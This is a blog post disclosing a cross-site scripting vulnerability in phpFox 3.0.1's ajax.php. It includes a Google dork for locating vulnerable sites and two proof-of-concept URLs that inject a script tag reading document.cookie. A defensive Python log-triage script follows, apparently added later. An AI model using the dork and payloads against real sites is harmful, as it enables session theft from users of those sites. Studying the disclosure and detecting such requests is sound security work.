
PhpFox 3.0.1 Cross Site Scripting | Juno_okyo's Blog

Google Dork: Intext:"Powered By phpFox Version 3.0.1"

Vendor Home : http://www.phpfox.com/

Many parameters in the ajax.php file are vulnerable to XSS, such as feed_id, message, title, ...
D3m0:

http://www.didarmasumane.tk//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id="><script>alert(document.cookie);</script>&item_id=518&_=1346525603467

http://www.didarmasumane.tk//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id=id&item_id=518"><script>alert(document.cookie);</script>&_=1346525603467
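
For triage of web logs against the pattern in the two demo requests, here is an added example (not part of the original post and not phpFox code) that flags `ajax.php` requests whose parameters carry markup or whose ID parameters are not integers. The function name, the placeholder host and the assumption that `feed_id` and `item_id` are integer IDs are mine.

```python
import re
from urllib.parse import urlsplit, unquote_plus

ID_PARAMS = {"feed_id", "item_id"}   # assumption: integer IDs, as item_id=518 suggests
MARKUP = re.compile(r'[<>"]')        # characters needed to close an attribute or open a tag


def flag_ajax_request(url):
    """Return {param: reason} for ajax.php parameters that warrant review."""
    parts = urlsplit(url)
    if not parts.path.endswith("/ajax.php"):
        return {}
    findings = {}
    # Split on '&' only: the payload itself contains ';'.
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        # Decode once so percent-encoded payloads are seen as the server sees them.
        name, value = unquote_plus(name), unquote_plus(raw)
        if MARKUP.search(value):
            findings[name] = "markup"
        elif name in ID_PARAMS and not value.isdigit():
            findings[name] = "not-an-integer"
    return findings


# Constructed request URLs (placeholder host), modelled on the two demo URLs above.
SAMPLES = [
    "http://phpfox.example.test/static/ajax.php?core[call]=comment.viewMoreFeed"
    "&feed_id=12&item_id=518&_=1346525603467",
    "http://phpfox.example.test/static/ajax.php?core[call]=comment.viewMoreFeed"
    '&feed_id="><script>alert(document.cookie);</script>&item_id=518',
    "http://phpfox.example.test/static/ajax.php?core[call]=comment.viewMoreFeed"
    "&feed_id=id&item_id=518%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E",
    "http://phpfox.example.test/index.php?feed_id=%3Cb%3E",  # not ajax.php: ignored
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(flag_ajax_request(sample) or "clean", "<-", sample[:72])
```

The same two rules (integer-only IDs, no raw markup characters echoed back) are what server-side validation and output encoding for these parameters would enforce.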
